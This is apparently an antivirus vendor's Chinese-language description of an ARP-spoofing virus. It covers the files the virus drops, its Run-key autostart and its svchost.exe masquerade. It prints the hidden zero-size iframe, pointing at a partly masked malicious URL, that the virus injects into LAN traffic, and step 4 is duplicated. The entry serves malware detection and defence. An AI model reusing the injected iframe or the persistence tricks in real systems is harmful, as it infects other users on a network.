Win32.Hack.Delf.196608

病毒名称(中文):

ARP欺骗196608病毒别名:

威胁级别:

病毒类型:

网页病毒病毒长度:

196608影响系统:

Win9x WinMe WinNT Win2000 WinXP Win2003

病毒行为:

这是一个ARP病毒。只要中了该病毒，在局域网内的机器打开浏览器浏览网页时，毒霸会一直报病毒。该病毒

利用传送数据包时嵌入带病毒的HTML代码，访问恶意网址下载恶意病毒。

1. 病毒运行后，首先释放以下病毒文件

%Systemroot%system32\\Packet.dll

%Systemroot%system32\\wpcap.dll

%Systemroot%system32\\WanPacket.dll

%Systemroot%system32\\Drivers\pf.sys

2. 创建自启动

在 HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run 下

创建 KVP 项,启动参数为: C:\\WINDOWS\\system32\\drivers\\svchost.exe

3. 该病毒会将自身复制到 %Systemroot%system32\\Drivers\\svchost.exe.

并运行 %Systemroot%system32\\Drivers\\svchost.exe, 之后又把 scvhost.exe

(注: 与 svchost.exe 区分开来),释放到%Systemroot%system32\\Drivers 目录下.

4. 往同一网关内的所有 IP 的数据包内插入以下 HTML 代码:

iframe src='http://www.z****0.com/0.htm' width=0 height=0

使局域网其它用户访问其恶意网址.

4. 往同一网关内的所有 IP 的数据包内插入以下 HTML 代码:

使局域网其它用户访问其恶意网址.